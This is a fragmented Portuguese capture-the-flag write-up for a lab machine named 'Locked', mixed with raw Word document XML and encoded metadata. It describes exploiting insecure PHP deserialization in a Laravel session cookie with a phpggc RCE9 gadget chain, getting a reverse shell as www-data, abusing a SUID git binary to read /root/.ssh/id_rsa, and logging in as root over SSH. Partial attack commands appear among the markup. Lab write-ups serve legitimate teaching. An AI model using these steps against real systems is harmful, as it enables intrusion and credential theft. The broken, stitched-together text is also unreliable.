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v0vgupcemm9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4w97yh3mtsm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Locked.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nsa67erncvu5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inicial da máquina foi realizada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 objetivo de identificar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 no sistema alvo.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Pelo Nmap, identificamos duas portas abertas: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(HTTP)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SSH).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serviço web ativo.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registro na aplicação, foi identificado um redirecionamento para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/secrets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qual disponibiliza uma funcionalidade de armazenamento de informações sensíveis, como anotações e credenciais.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das ferramentas de desenvolvedor do navegador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(F12),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identificar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aplicação. Entre eles, destaca-se o cookie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a aplicação foi desenvolvida utilizando o framework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decodificação do cookie em Base64, foi identificado o formato padrão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serialização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Laravel, contendo os campos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padrão é compatível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 5.5+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até versões recentes. A ausência de valor no campo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indica o uso do algoritmo de criptografia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AES-256-CBC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 não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AES-GCM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pdiI6InZ3WFdWYytQOFNTRUZFdEdmbklqRnc9PSIsInZhbHVlIjoiZGgrMUd5VW9MRXBYL1lVdldOc1BQNnRKZ0lhK1gxTVN4bVVuOU02SitBdU5oQzlmZjhIN0l3aDk3djJ6c3lobmc5bGpMZHBkVUpIaWtvOHhzak04V1paTDlvR2tpS3NIWmVFRUxRcUE0cjBBRXlBVE9KdjB0TEY4OHNET0VOQnoiLCJtYWMiOiIwYjUzNzUyZjNlNGRlMjNhNDhlMjI1M2YzMDk0ODc2Y2ViMDU3Yjk0NjhlYTYxZDQyNGNiODc5OWQ1NDI4N2ZiIiwidGFnIjoiIn0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{"iv":"vwXWVc+P8SSEFEtGfnIjFw==","value":"dh+1GyUoLEpX/YUvWNsPP6tJgIa+X1MSxmUn9M6J+AuNhC9ff8H7Iwh97v2zsyhng9ljLdpdUJHiko8xsjM8WZZL9oGkiKsHZeEELQqA4r0AEyATOJv0tLF88sDOENBz","mac":"0b53752f3e4de23a48e2253f3094876ceb057b9468ea61d424cb8799d54287fb","tag":""}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96900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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rdbe7u52a08r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do cookie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laravel_session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aplicação também utiliza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46100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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token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ser decodificado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revela um objeto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serializado contendo informações relacionadas ao usuário autenticado.</w:t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"TzoyMzoiQXBwXFN1cHBvcnRcU2Vzc2lvbkRhdGEiOjM6e3M6NjoidXNlcklkIjtpOjE7czo1OiJlbWFpbCI7czoxNToidGVzdGVAdGVzdGUuY29tIjtzOjQ6Im5hbWUiO3M6NToidGVzdGUiO30="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O:23:"App\Support\SessionData":3:{s:6:"userId";i:1;s:5:"email";s:15:"teste@teste.com";s:4:"name";s:5:"teste";}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2900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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comportamento indica que a aplicação realiza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serialização de dados no lado servidor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consequentemente, pode executar operações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unserialize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sobre o conteúdo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user_session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Tal prática expõe a aplicação a uma possível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desserialização insegura em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manipulação de objetos serializados controlados pelo usuário.</w:t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validar a existência da vulnerabilidade, foi utilizada a ferramenta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phpgcc</w:t>
        </w:r>
      </w:hyperlink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gerar um objeto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serializado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contendo uma cadeia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gadgets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capaz de executar um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direcionado à máquina do atacante, permitindo a confirmação da falha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desserialização insegura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PAYLOAD=$(./phpggc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Laravel/RCE9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"Cookie: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user_session=$PAYLOAD"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57400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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requisição foi recebida pelo servidor do atacante, confirmando a execução do payload e validando a existência da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desserialização insegura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a exploração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desserialização insegura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permite a obtenção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execução remota de comandos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o estabelecimento de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 reversa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sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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PAYLOAD=$(./phpggc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Laravel/RCE9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"Cookie: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user_session=$PAYLOAD"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30400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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conexão reversa foi estabelecida com sucesso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resultando em acesso remoto ao sistema com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www-data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pertencente ao contexto da aplicação web.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shell obtida foi estabilizada em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TTY interativo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execução confiável de comandos no sistema alvo.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3ybadllu1h08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find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realizada a enumeração de binários com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bit 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configurado, permitindo identificar executáveis que são executados com privilégios do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Durante essa análise, foi identificado que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o bit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habilitado.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-4000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25400" l="25400" r="25400" t="2540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binário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executado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devido ao bit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acessar arquivos restritos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/root/.ssh/id_rsa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hyperlink r:id="rId2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https://gtfobins.github.io/gtfobins/git/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/root/.ssh/id_rsa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25400" l="25400" r="25400" t="2540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posse da chave privada do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estabelecer conexão via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privilégios administrativos no sistema alvo.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root@&lt;machine-ip&gt;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25400" l="25400" r="25400" t="2540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50900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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do usuário root se encontra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84200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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headerReference r:id="rId30" w:type="even"/>
      <w:footerReference r:id="rId31" w:type="default"/>
      <w:footerReference r:id="rId32" w:type="first"/>
      <w:footerReference r:id="rId3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>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.fjodndbx57tm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0" name="image9.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic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9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Locked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3.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/gi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3.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml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6.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId32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19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hyperlink" Target="https://github.com/ambionics/phpggc" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ambionics/phpggc" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8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CBu1O22whFTYhUZwJ4ER7RVkg==">CgMxLjAyDmgudjB2Z3VwY2VtbTlxMg5oLjc0dzk3eWgzbXRzbTIOaC5uc2E2N2VybmN2dTUyDmgucmRiZTd1NTJhMDhyMg5oLjN5YmFkbGx1MWgwODIOaC5mam9kbmRieDU3dG04AHIhMXBVaVNDQjlzN0FCSFZiSGJ4aFJXeDIwSVFMRENIMGlv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